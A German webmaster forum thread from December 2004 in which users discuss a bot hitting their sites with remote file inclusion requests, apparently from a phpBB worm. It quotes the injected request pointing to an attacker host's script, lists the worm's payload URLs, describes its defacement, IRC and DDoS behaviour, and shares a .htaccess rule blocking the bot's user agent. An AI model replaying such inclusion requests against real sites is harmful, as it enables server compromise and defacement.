Script Kiddys ???

Beitrag von **Ice Man** » 25.12.2004, 14:29

Also ich bekomme seit heute immer die Fehlermeldung, das einer meiner Unterseiten mit dieser Variable aufgerufen wird

click.php?id= (da kommt normalerweise eine meiner IDs )

aber nun kommt immer das

out-click.php?id=https://www.visualcoders.net/spy.gif?&c ... %20php.txt

Ist doch nicht normal oder ?

das gif ist auch etwas komisch, schaut selbst

[www.visualcoders.net/spy.gif]

Kann mir einer sagen was das bedeutet ?

von **Anzeige von ABAKUS** »

SEO Consulting bei ABAKUS Internet Marketing
Erfahrung seit 2002

persönliche Betreuung
individuelle Beratung
kompetente Umsetzung

Jetzt anfragen: 0511 / 300325-0.

Beitrag von **Christophe** » 25.12.2004, 14:33

Jemand versucht dich zu hacken. Bei sauber geschriebenen Scripten hat das keine Chance.

Beitrag von **treo** » 25.12.2004, 14:41

naja, es ist ein bot der das ganze macht.
Ich hab den etwa 4 mal heute da gehabt,
er kommt aber nicht durch

Beitrag von **Ice Man** » 25.12.2004, 14:42

Bin scheinbar nicht der einzigste

https://www.visualcoders.net/viewtopic.php?t=94

Da schreiben viele, das bei denen das selbe ist.
Möglich das deren Forum infiziert von einem Wurm ist, scheinbar haben die ne Version <2.0.11

Beitrag von **sean** » 25.12.2004, 14:50

@Ice Man

Das kommt bei mir auch öfter vor. Wenn man eine print.php, redirect.php oder mailto.php hat versuchen einige darüber andere Webseiten zu laden oder Emails zu versenden.

Man muß das entsprechend absichern, sonst wird über die Scripte gespammt.

sean

Beitrag von **treo** » 25.12.2004, 14:56

ja, das muss man, man sollte niemals den Eingaben eines Users vertrauen.

übrigends: ladet euch doch mal das runter was der bot runterladen wollte, man kann ihn so recht gut analysieren weil ja alles als perlscript daher kommt

Beitrag von **Pompom** » 25.12.2004, 15:33

Die versuchen über php mehrere Scripts auf deinen Server zu laden, mit denen
sie herausbekommen können, ob dies geklappt hat.
Wenn: Dann können sie dir auch die "richtigen" Programm unterschieben.

Diese Scripts sind:
https://www.visualcoders.net/spybot.txt
https://www.visualcoders.net/worm1.txt
https://www.visualcoders.net/php.txt
https://www.visualcoders.net/ownz.txt
https://www.visualcoders.net/zone.txt

Wenn es geklappt hat, findest du diese im Verzeichnis
/tmp

Beitrag von **Pompom** » 25.12.2004, 15:41

https://www.visualcoders.net/ownz.txt ist übrigens ein Script zum Deface.
Alle index-Dateien (im /home-Pfad) werden mit

"spykids ownz your server" verziert.

Kann dann z.B. so nett aussehen: https://exce.free.fr/

Beitrag von **Ice Man** » 25.12.2004, 17:13

ich hab mal ebend folgendes in die -htacces eingetragen

RewriteCond %{HTTP_USER_AGENT} ^LWP::Simple [OR]

damit sollte der Spuck vorerst beendet sein

Beitrag von **treo** » 25.12.2004, 17:39

ich habe mir den Wurm mal genauer angeschaut,
wie genau er reinkommt weiß ich bis jetzt zwar immer noch nicht, aber ich weiß was er anstellt wenn er dann mal drin ist,
neben dem Defacement verbindet er sich auch auf einen IRC Server und wartet dann auf aufträge, so kann er z.b. ein DDoS starten.
Außerdem startet er sich nochmal selbst und verbreitet sich weiter,
es wird dabei aber immer nur auf visualcoders.net als quelle zugegriffen um sich zu kopieren

Beitrag von **Ice Man** » 25.12.2004, 19:34

sie wie es im Moment ausschaut, wurde die Seite entweder tot gelegt oder der Server ist zusammen gebrochen oder wurde abgeschaltet.

Jedenfalls ist aktuell nix mehr da ....

Beitrag von **treo** » 25.12.2004, 19:45

ich hab heute morgen ja auch ne mail bei heise gelassen deswegen, bzw. auch ein bisschen Koresspondenz gehalten
Nun gibts auch die passende Tickermeldung:
https://www.heise.de/newsticker/meldung/54623

Beitrag von **Moddy** » 26.12.2004, 19:10

der Wurm dürfte es schwer haben jetzt noch Opfer zu finden, Google hat die abbbfrage Allinurl:Viewtopic.php gestern gesperrt

Edit, ur die Abfrage allinurl:viewtopic.php wurde gesperrt, also klein geschrieben

Beitrag von **stp69** » 27.12.2004, 10:10

Moin,

auch ich wurde "Opfer" von den htacces .net anfragen. Mein Provider stönte am 2 Weihnachtstag und musste in der Nacht von 25 auf den 26 wohl angeblich wegen mir den Server runterfahren.... obgleich da nur ne kleine XT-Commerce löaung läuft

Mein Provider bat mich den Shop upzudaten. Ich werd mal die oben von Ice Man angesprochene Zeile in die htacces eintragen... hoffentlich hilft es.

Gruß
Stephan

Beitrag von **opetzold** » 27.12.2004, 16:00

stp69 hat geschrieben:Moin,
Mein Provider stönte am 2 Weihnachtstag und musste in der Nacht von 25 auf den 26 wohl angeblich wegen mir den Server runterfahren.... obgleich da nur ne kleine XT-Commerce löaung läuft

Mein Provider bat mich den Shop upzudaten.

Hallo,

IHMO hat dir dein Provider Unsinn erzählt. Ich habe sogar noch die 1 Jahr alte BETA von XTC als Shop laufen und diese hat einen Ansturm von mehreren Bots seit Tagen problemlos überstanden.

Die Idee mit der htacces werde ich trotzdem mal auch probieren.

Gruß Olaf